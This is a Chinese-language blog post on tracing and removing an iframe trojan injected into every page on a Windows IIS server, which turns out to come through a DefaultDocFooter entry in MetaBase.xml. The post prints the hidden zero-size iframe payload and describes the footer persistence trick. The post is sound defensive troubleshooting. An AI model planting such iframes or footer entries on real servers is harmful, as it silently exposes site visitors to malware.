


Windows服務器下查IIS被掛iframe木馬
一臺服務器 幾乎所有網站打開網頁 甚至HTML網頁 都出現了
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
這種樣式的代碼 有的在頭部 有的在尾部 部分殺毒軟件打開會報毒
打開HTML或ASP PHP頁面 在源碼中怎么也找不到這段代碼
分析原因
首先懷疑ARP掛馬,用防ARP的工具又沒有發現有arp欺騙
而且arp欺騙一般不會每次都被插入代碼,而是時有時無
而且使用http://127.0.0.1 或者http://localhost 訪問的時候也可以找到這段代碼
arp欺騙的可能排除。
然后就想到可能是JS被篡改,或者是其它的包含文件,查找后沒有發現被改的頁面 連新建的HTML頁面瀏覽的時候也會被插入這段代碼,那就只能是通過IIS掛上去的了。
備份iis數據然后重裝iis,代碼消失,將備份的iis恢復,問題又來了。
仔細尋找,問題應該出在IIS的配置文件上,打開配置文件,沒有發現那段代碼。
那很有可能是調用了某個文件,這個怎么查啊,忽然想起了大名鼎鼎的Filemon
本地載了一個上傳到服務器上,打開Filemon,數據太多了,過濾掉一些沒有用的
只留下iis的進程,數據還是很多,看來服務器上的站點還是挺多人在訪問的。
關掉所有站點,建了一個測試站點anky 目錄為D:\www\ 在下面建了一個空白頁面test.htm
訪問一下這個頁面代碼被插進來了,再看一下Filemon 奇怪怎么讀取C:\Inetpub\wwwroot\iisstart.htm
打開C:\Inetpub\wwwroot\iisstart.htm一看,里面就躺著
<iframe src="http://xxxdfsfd/web.htm" height=0 width=0></iframe>
把代碼刪除了留空,訪問test.htm 正常了,把C:\Inetpub\wwwroot\iisstart.htm刪除了再訪問
test.htm 出現 “讀取數據頁腳文件出錯”問題就出這里了,看來是調用了
這個文件。
把C:\Inetpub\wwwroot\iisstart.htm清空就正常了,這樣怎么行,解決問題當然要連根拔掉。
continue
有沒有可能是擴展造成的,到擴展中檢查了一遍全部都是正常的
當然 通過ISAPI 掛馬的也是存在的
左想右想最后還是覺得配置文件有問題
打開配置文件,配置文件在%windir%\system32\inetsrv\MetaBase.xml
用記事本打開,查找iisstart.htm 找到一行,開始以為是默認站點,后來一想不對啊
默認站點都刪除了,再仔細一看這句代碼為
DefaultDocFooter="FILE:C:\Inetpub\wwwroot\iisstart.htm"
刪除掉這一行,問題徹底解決了。
關鍵詞: windows 服務器 IIS 木馬
新文章:
- CentOS7下圖形配置網絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統后丟失windows啟動項
- CentOS單網卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網打印機IP講解
- CentOS7使用hostapd實現無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網絡重啟出錯
- 解決Centos7雙系統后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統有什么不同呢
- Centos 6.6默認iptable規則詳解